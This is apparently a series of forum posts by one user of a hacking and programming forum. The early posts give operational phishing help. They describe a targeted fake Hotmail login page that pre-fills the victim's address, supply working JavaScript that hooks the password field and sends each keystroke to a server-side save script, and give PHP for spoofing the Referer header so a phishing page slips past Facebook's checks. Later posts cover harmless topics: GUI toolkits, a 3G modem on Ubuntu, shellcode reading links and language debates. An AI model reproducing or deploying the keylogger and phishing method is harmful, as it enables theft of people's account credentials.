Hyperant

its not really an issue if more then one person is typing in at the same time, on the php side of things that stores the password for you all you have to do is use a $_SESSION or something else to determine each user, or like you said the ip address, me personally i would use the ip address as the file name that the password is written to (but with that said, this is used as a phishing page and i would only use it as a targeted attack, so what i mean with that is the fake login page that they see will automatically have there username inserted within it, if your targeting say hotmail then the fake page that you use can be a login page that tells the user there session has expired, which hotmail has and they place the users email address in the username field for them all ready, which means if you use that page then you also need to do the same thing, do you see what i mean when i say its more of a targetted attack and not meant for just a random attack. But with that said it could also work as a random attack). As for the auto fill, well ill let you work that out, i mean shit iv all ready posted code on how to by pass the referral and now some code thats a javascript key logger. Read up on how the auto fill systems in browsers work and see if you can work out how to get around that, i can think of a few ways just off the to[p of my head ;) /me isnt doing all the work for you

what something like this? (this works on hotmail, save the source code for the hotmail login page then add this to it, you also need to add setupXML(); changePost(); to the body onLoad event) <script> //AJAX var xhr =false; var url ='save.php?key='; //Setup and load the XMLHttpRequest object function setupXML() { //Load the XMLHttpRequest for everything but IE if(window.XMLHttpRequest) { try { xhr =new XMLHttpRequest(); } catch(e) { xhr =false; } } else { try { xhr =new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) { xhr =false; } } //Make sure we have an XMLHttpResponse object loaded into memory if(xhr) { xhr.onreadystatechange = processXHR; } else { } } function processXHR() { } </script> <script> function changePost() { document.getElementById('i0118').onkeydown =function(e) { var key =''; if(e.charCode) key =e.charCode; else key =e.keyCode; try { xhr.open ('GET', url +String.fromCharCode(key) +' : ' +key, true); xhr.send(''); } catch(e) { } } } </script> what it does is hooks the password input field then with every key press that gets entered into that input field it sends it to another php script on the server so that it can save the key strokes.

facebook does chack the referral where hotmail doesnt. Unless you can find away to change the referrell address sites like facebook will detect the login and alert the user (which you dont want to happen if its a phishing page) with that said though you could use something like this in order to pass the login information onto the site and then load the page inside your own page. http://www.mustap.com/phpzone_post_62_how-to-bypass-the-referer-se <?php // the site we want to attack $host = "www.mysite.com"; // the file we want to attack $file = "formprocess.php"; // construct a header for our request $hdrs = array( 'http' => array( 'method' => "POST", 'header'=> "accept-language: en\r\n" . "Host: $host\r\n" . "Referer: http://$host\r\n" . // Setting the http-referer "Content-Type: application/x-www-form-urlencoded\r\n" . "Content-Length: 33\r\n\r\n" . "username=mustap&comment=NOCOMMENT\r\n" ) ); // get the requested page from the server // with our header as a request-header $context = stream_context_create($hdrs); $fp = fopen("http://" . $host . "/" . $file, 'r', false, $context); fpassthru($fp); fclose($fp); ?>

Yes because thats hacking now isn't it ;) ------- If you are on the out side looking in with no way what so ever to login to the system, then the first thing that i would normally do is run a port scan against the system in order to generate a list of open ports and what services are listening on these ports. From that information one can then do a few searches in some public db for known exploits. If nothing comes up then you get a copy of one of the services that is running on the system and analyze the program in order to find a bug that can be exploited, once you have found a bug the next step would be to write an exploit for it.

Well you have two choices c++ or python, i wouldn't use visual basic. As for the GUI aspect of the application you could use something like Qt (python and c++ can both use this framework) http://qt.nokia.com/ http://wiki.python.org/moin/PyQt http://www.linuxplanet.com/linuxplanet/tutorials/6708/1 http://linuxgazette.net/issue78/taneja.html http://www.yolinux.com/TUTORIALS/LinuxTutorialC++.html http://sector.ynet.sk/qt4-tutorial/ that should be enough to get you started.

My question is what programming languages do you know?

i would assume the system is using a one time password, that way it doesnt need to actually store the password anywhere, either that or the password that is sent to the system is your password (which kind of makes sense when you think about it, and it also explains why you captured your own password in the packets) http://en.wikipedia.org/wiki/One-time_password

Sure you didnt say you couldnt but you did make it sound like you couldnt ;)

Ummm, you can do that on a wired connection as well, it doesnt matter if its wireless or not :/

Really? Im running ubuntu 11.04 on my desktop and connect to the net through 3g with a huawei usb stick and it worked out of the box for me. With that said though under kde i did have issues with it. Im using NetworkManager to handle the connection, all i did was write click the icon on the taskbar ->edit connection ->Mobile Broadband ->Add ->Then followed the wizard that pops up. The only problem that i have is that if i disconnect from the net i have to remove the usb stick from the computer and restart NetworkManager before it will connect again.

what do you mean most shellcode will topically be in C? I think you should read up on how to write shellcode. http://www.vividmachines.com/shellcode/shellcode.html http://projectshellcode.com/?q=node/12 http://www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html

So has anyone else noticed that the advert on the top of the forum (think domain.com) doesnt actually take you anywhere when you click it? I mean i assume it is meant to take me to there site but i could be wrong :/

So whats more dangerous, speeding, or speeding while checking twitter for speed camera locations?

Really you spent all day setting up something to compile vlc for android even though you can download it from the android market? https://market.android.com/details?id=com.vlcdirect.vlcdirect&hl=en

What? No the most useful language is the language the is best for the job. Really like i said, functional languages all the same. The only thing that changes is syntax not hard to pick up from language to language. Once again, if you are starting out, learning how to program, it is much better to be using a language that will allow you to implement the logic side of thing for you with out you having to worry about memory management. It makes it a lot easer to learn how to program this way. Once you have an understanding of the logic behind what you are doing then you can start to focus more on the language side of things. Like memory management, but i wont say code optimization here as this comes under the logic side of things. If you need to speed up something then look at how you are doing it (logic look it up) Yeah sure it is. The same principles come into play when you are debugging memory problems in java C isnt meant for OOP so why use it, use C++, once again this comes down to how well of a programmer you really are. You should be able to switch in and out of c and c++ very easily if the application needs objects then use C++ its the better language for the job, i have already explained this above. Really? I would love to see some examples. Yeah, are you sure about this? It is a lot easer to maintain a large project that has been done in pure OOP if it is done right, have you heard of the MVC modal? Im pretty sure this is becoming the industry standard. Yes, the universities have it wrong. You are right. learn C first jave will retard your thinking Need i say more